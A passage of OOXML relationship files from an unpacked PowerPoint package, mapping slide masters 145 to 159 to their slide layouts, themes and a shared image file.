<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1449.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1448.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1447.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1446.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1445.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1444.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1443.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1442.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme145.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1450.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1441.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster146.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1459.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1458.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1457.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1456.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1455.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1454.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1453.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1452.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme146.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1460.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1451.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster147.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1469.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1468.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1467.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1466.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1465.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1464.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1463.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1462.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme147.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1470.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1461.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster148.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1479.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1478.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1477.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1476.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1475.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1474.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1473.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1472.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme148.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1480.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1471.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster149.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1489.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1488.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1487.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1486.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1485.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1484.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1483.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1482.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme149.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1490.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1481.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout149.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout148.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout147.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout146.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout145.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout144.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout143.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout142.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme15.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout150.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout141.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster150.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1499.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1498.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1497.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1496.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1495.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1494.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1493.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1492.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme150.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1500.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1491.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster151.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1509.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1508.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1507.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1506.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1505.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1504.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1503.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1502.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme151.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1510.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1501.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster152.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1519.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1518.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1517.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1516.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1515.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1514.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1513.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1512.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme152.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1520.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1511.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster153.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1529.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1528.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1527.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1526.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1525.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1524.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1523.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1522.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme153.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1530.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1521.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster154.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1539.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1538.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1537.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1536.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1535.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1534.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1533.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1532.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme154.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1540.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1531.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster155.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1549.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1548.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1547.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1546.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1545.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1544.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1543.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1542.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme155.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1550.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1541.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster156.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1559.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1558.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1557.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1556.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1555.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1554.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1553.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1552.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme156.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1560.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1551.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster157.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1569.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1568.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1567.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1566.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1565.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1564.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1563.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1562.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme157.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1570.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1561.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster158.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1579.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1578.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1577.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1576.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1575.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1574.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1573.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1572.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme158.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1580.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1571.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster159.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1589.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1588.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1587.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1586.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1585.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1584.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1583.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1582.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme159.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1590.xml"/><Relationship Id="rId1" 